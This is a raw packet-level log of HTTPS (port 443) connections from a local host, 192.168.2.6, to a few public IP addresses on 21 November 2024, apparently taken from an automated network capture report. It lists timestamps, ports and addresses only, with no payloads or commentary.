                                                                                                                                                                        Nov 21, 2024 10:38:16.275022984 CET49910443192.168.2.652.149.20.212
                                                                                                                                                                        Nov 21, 2024 10:38:16.275039911 CET4434991052.149.20.212192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:16.275049925 CET49910443192.168.2.652.149.20.212
                                                                                                                                                                        Nov 21, 2024 10:38:16.275085926 CET49910443192.168.2.652.149.20.212
                                                                                                                                                                        Nov 21, 2024 10:38:16.276573896 CET49933443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:16.276612997 CET4434993313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:16.276684046 CET49933443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:16.277232885 CET49933443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:16.277250051 CET4434993313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:16.311146021 CET4434991052.149.20.212192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:16.311212063 CET49910443192.168.2.652.149.20.212
                                                                                                                                                                        Nov 21, 2024 10:38:16.311217070 CET4434991052.149.20.212192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:16.311271906 CET49910443192.168.2.652.149.20.212
                                                                                                                                                                        Nov 21, 2024 10:38:16.311394930 CET49910443192.168.2.652.149.20.212
                                                                                                                                                                        Nov 21, 2024 10:38:16.311412096 CET4434991052.149.20.212192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:16.311450958 CET49910443192.168.2.652.149.20.212
                                                                                                                                                                        Nov 21, 2024 10:38:16.311455965 CET4434991052.149.20.212192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:16.343905926 CET4434992113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:16.344528913 CET49921443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:16.344563007 CET4434992113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:16.345037937 CET49921443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:16.345042944 CET4434992113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:16.483450890 CET4434992213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:16.484489918 CET49922443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:16.484507084 CET4434992213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:16.485048056 CET49922443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:16.485054016 CET4434992213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:16.562516928 CET4434992313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:16.563496113 CET49923443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:16.563518047 CET4434992313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:16.564094067 CET49923443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:16.564099073 CET4434992313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:16.778435946 CET49934443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:38:16.778469086 CET4434993440.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:16.778577089 CET49934443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:38:16.779130936 CET49934443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:38:16.779146910 CET4434993440.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:16.780040026 CET4434992113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:16.783211946 CET4434992113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:16.783380032 CET49921443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:16.783399105 CET4434992113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:16.783459902 CET4434992113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:16.783559084 CET49921443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:16.783631086 CET49921443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:16.783644915 CET4434992113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:16.783653975 CET49921443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:16.783658981 CET4434992113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:16.786025047 CET49935443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:16.786061049 CET4434993513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:16.786118984 CET49935443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:16.786303043 CET49935443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:16.786314011 CET4434993513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:16.937868118 CET4434992213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:16.940932989 CET4434992213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:16.941005945 CET49922443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:16.941075087 CET49922443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:16.941092014 CET4434992213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:16.941103935 CET49922443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:16.941109896 CET4434992213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:16.943974018 CET49938443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:16.944011927 CET4434993813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:16.944119930 CET49938443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:16.944276094 CET49938443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:16.944292068 CET4434993813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:17.007725000 CET4434992313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:17.010684013 CET4434992313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:17.010754108 CET49923443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:17.010781050 CET4434992313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:17.010804892 CET4434992313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:17.010864973 CET49923443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:17.010910034 CET49923443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:17.010922909 CET4434992313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:17.010941982 CET49923443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:17.010946989 CET4434992313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:17.013657093 CET49939443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:17.013700008 CET4434993913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:17.013772964 CET49939443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:17.014034033 CET49939443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:17.014050961 CET4434993913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:17.085334063 CET4434992413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:17.086175919 CET49924443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:17.086206913 CET4434992413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:17.086735010 CET49924443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:17.086743116 CET4434992413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:17.530349970 CET4434992413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:17.533586025 CET4434992413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:17.533720016 CET49924443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:17.533974886 CET49924443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:17.533974886 CET49924443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:17.534013987 CET4434992413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:17.534022093 CET4434992413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:17.538285017 CET49940443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:17.538328886 CET4434994013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:17.538628101 CET49940443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:17.539124012 CET49940443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:17.539150000 CET4434994013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:18.123857975 CET4434993313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:18.125576019 CET49933443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:18.125596046 CET4434993313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:18.126065969 CET49933443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:18.126071930 CET4434993313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:18.575747967 CET4434993313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:18.578926086 CET4434993313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:18.578977108 CET49933443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:18.578994036 CET4434993313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:18.579010963 CET4434993313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:18.579058886 CET49933443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:18.579663992 CET49933443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:18.579679966 CET4434993313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:18.579690933 CET49933443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:18.579695940 CET4434993313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:18.582941055 CET4434993513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:18.583003044 CET49946443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:18.583029985 CET4434994613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:18.583084106 CET49946443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:18.583244085 CET49946443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:18.583254099 CET4434994613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:18.583472967 CET49935443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:18.583496094 CET4434993513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:18.583971977 CET49935443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:18.583977938 CET4434993513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:18.593678951 CET4434993440.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:18.593756914 CET49934443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:38:18.596453905 CET49934443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:38:18.596473932 CET4434993440.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:18.596707106 CET4434993440.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:18.598310947 CET49934443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:38:18.598361969 CET49934443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:38:18.598367929 CET4434993440.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:18.598488092 CET49934443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:38:18.639344931 CET4434993440.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:18.658947945 CET4434993813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:18.659387112 CET49938443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:18.659420013 CET4434993813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:18.659904003 CET49938443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:18.659912109 CET4434993813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:18.800237894 CET4434993913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:18.824506044 CET49939443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:18.824527025 CET4434993913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:18.825005054 CET49939443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:18.825009108 CET4434993913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:18.997982979 CET4434993440.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:18.998117924 CET4434993440.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:18.998210907 CET49934443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:38:18.998466969 CET49934443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:38:18.998486042 CET4434993440.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:19.066353083 CET4434993513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:19.069397926 CET4434993513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:19.069489002 CET49935443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:19.074727058 CET49935443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:19.074727058 CET49935443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:19.074764967 CET4434993513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:19.074807882 CET4434993513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:19.077461958 CET49947443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:19.077507019 CET4434994713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:19.077585936 CET49947443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:19.077735901 CET49947443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:19.077744961 CET4434994713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:19.093168020 CET4434993813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:19.096311092 CET4434993813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:19.096376896 CET49938443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:19.096437931 CET49938443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:19.096455097 CET4434993813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:19.096472979 CET49938443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:19.096477985 CET4434993813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:19.118275881 CET49948443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:19.118308067 CET4434994813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:19.118377924 CET49948443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:19.118522882 CET49948443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:19.118535995 CET4434994813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:19.300621033 CET4434993913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:19.303637981 CET4434993913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:19.303723097 CET49939443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:19.324441910 CET49939443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:19.324455976 CET4434993913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:19.324467897 CET49939443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:19.324474096 CET4434993913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:19.327697992 CET49953443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:19.327719927 CET4434995313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:19.327780008 CET49953443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:19.328152895 CET49953443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:19.328166008 CET4434995313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:19.387065887 CET4434994013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:19.387608051 CET49940443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:19.387645960 CET4434994013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:19.388051987 CET49940443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:19.388060093 CET4434994013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:19.838816881 CET4434994013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:19.842020035 CET4434994013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:19.842089891 CET49940443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:19.842117071 CET4434994013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:19.842139006 CET4434994013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:19.842201948 CET49940443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:19.842242002 CET49940443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:19.842257023 CET4434994013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:19.842266083 CET49940443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:19.842272043 CET4434994013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:19.845112085 CET49954443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:19.845154047 CET4434995413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:19.845442057 CET49954443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:19.845578909 CET49954443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:19.845588923 CET4434995413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:20.302143097 CET4434994613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:20.306035042 CET49946443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:20.306051970 CET4434994613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:20.306641102 CET49946443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:20.306646109 CET4434994613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:20.736902952 CET4434994613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:20.740019083 CET4434994613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:20.740080118 CET49946443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:20.740142107 CET49946443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:20.740159035 CET4434994613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:20.740170956 CET49946443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:20.740175962 CET4434994613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:20.743000984 CET49956443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:20.743042946 CET4434995613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:20.743114948 CET49956443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:20.743386984 CET49956443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:20.743405104 CET4434995613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:20.836942911 CET4434994813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:20.837709904 CET49948443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:20.837727070 CET4434994813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:20.838535070 CET49948443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:20.838540077 CET4434994813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:20.857868910 CET4434994713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:20.858546019 CET49947443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:20.858572006 CET4434994713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:20.859236002 CET49947443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:20.859246016 CET4434994713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:21.107217073 CET4434995313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:21.114938021 CET49953443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:21.114963055 CET4434995313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:21.115711927 CET49953443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:21.115720034 CET4434995313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:21.271178961 CET4434994813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:21.274281979 CET4434994813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:21.274354935 CET49948443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:21.274414062 CET49948443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:21.274414062 CET49948443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:21.274429083 CET4434994813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:21.274436951 CET4434994813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:21.277137995 CET49959443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:21.277180910 CET4434995913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:21.277246952 CET49959443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:21.277385950 CET49959443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:21.277398109 CET4434995913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:21.300847054 CET4434994713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:21.304213047 CET4434994713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:21.304265976 CET4434994713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:21.304284096 CET49947443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:21.304323912 CET49947443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:21.304375887 CET49947443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:21.304400921 CET4434994713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:21.304419041 CET49947443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:21.304425955 CET4434994713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:21.306875944 CET49961443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:21.306917906 CET4434996113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:21.306991100 CET49961443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:21.307112932 CET49961443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:21.307131052 CET4434996113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:21.550134897 CET4434995313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:21.553440094 CET4434995313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:21.553513050 CET49953443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:21.553580046 CET49953443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:21.553589106 CET4434995313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:21.553600073 CET49953443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:21.553605080 CET4434995313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:21.556349993 CET49962443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:21.556391954 CET4434996213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:21.556463957 CET49962443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:21.556610107 CET49962443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:21.556623936 CET4434996213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:21.568825006 CET4434995413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:21.569300890 CET49954443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:21.569328070 CET4434995413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:21.569744110 CET49954443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:21.569750071 CET4434995413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:22.074861050 CET4434995413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:22.075017929 CET4434995413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:22.075062037 CET49954443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:22.075387001 CET49954443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:22.075398922 CET4434995413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:22.075438023 CET49954443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:22.075443029 CET4434995413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:22.079782009 CET49963443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:22.079835892 CET4434996313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:22.079911947 CET49963443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:22.080084085 CET49963443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:22.080096960 CET4434996313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:22.584369898 CET4434995613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:22.584897041 CET49956443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:22.584943056 CET4434995613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:22.585374117 CET49956443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:22.585380077 CET4434995613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:23.021202087 CET4434995613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:23.024360895 CET4434995613.107.246.60192.168.2.6
